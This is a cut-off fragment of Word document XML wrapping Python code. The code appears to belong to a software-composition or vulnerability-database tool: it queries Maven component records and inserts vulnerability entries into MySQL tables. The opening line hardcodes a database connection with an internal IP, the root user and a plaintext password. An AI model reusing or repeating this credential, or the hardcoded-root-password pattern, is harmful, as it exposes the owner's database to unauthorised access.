        <w:t>pymysql,50,host='192.168.3.199',user='root',passwd='1qaz@WSX',db='sca',port=23306, maxconnections=None, blocking=True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB61C9D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E749BC9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>conn = mysql_pool.connection()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A894550" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F34D8FE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        with conn.cursor() as cur:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79755453" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2530DC01" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>temporary_purl = self.get_purl("maven", pom_xml_data['group_id'], pom_xml_data['artifact_id'], pom_xml_data['version'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E74E2E9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4531E899" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                cur.execute(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B51B43" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    'SELECT uuid,name,description,url,organization FROM oss_components_maven WHERE `purl`=%s',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE39F7A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1369BF66" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                        temporary_purl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE068BF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1F462B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D3D735" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                query_row = cur.fetchone()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F3E233" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                conn.commit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C397F1E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        except Exception as err:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CE6B68" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            log_debug.error('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测组件占位数据出现错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'+temporary_purl+str(err))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFB2F86" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            conn.rollback()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285B111B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        finally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AC022A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            conn.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DBD86F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C77EFC3" w14:textId="77777777" w:rsidR="00492A02" w:rsidRDefault="00492A02" w:rsidP="00492A02">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>pymysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">dbutils.pooled_db </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>PooledDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520ABF43" w14:textId="77777777" w:rsidR="004C452C" w:rsidRPr="00492A02" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="607A43F1" w14:textId="77777777" w:rsidR="00492A02" w:rsidRDefault="00492A02" w:rsidP="00492A02">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>insertAVD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>item_data</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>vul_type</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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>False</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>为不存在，返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>为存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    # log_data.success("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>数据库接受数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"+str(tweet_item)+str(cves)+str(time))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">global </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mysql_pool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">global </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mysql_db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>vul_type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"high-risk"</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">global </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mysql_table_avd_high_risk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        tableName = mysql_table_avd_high_risk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">elif </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>vul_type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"nonvd"</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">global </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mysql_table_nonvd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        tableName = mysql_table_nonvd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>try</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conn = mysql_pool.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>connection</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>conn.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cursor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cur:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            sql = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2D3139"/>
        </w:rPr>
        <w:t>replace into `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>{DB_NAME}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2D3139"/>
        </w:rPr>
        <w:t>`.`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>{TABLE_NAME}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2D3139"/>
        </w:rPr>
        <w:t xml:space="preserve">` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">" </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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2D3139"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
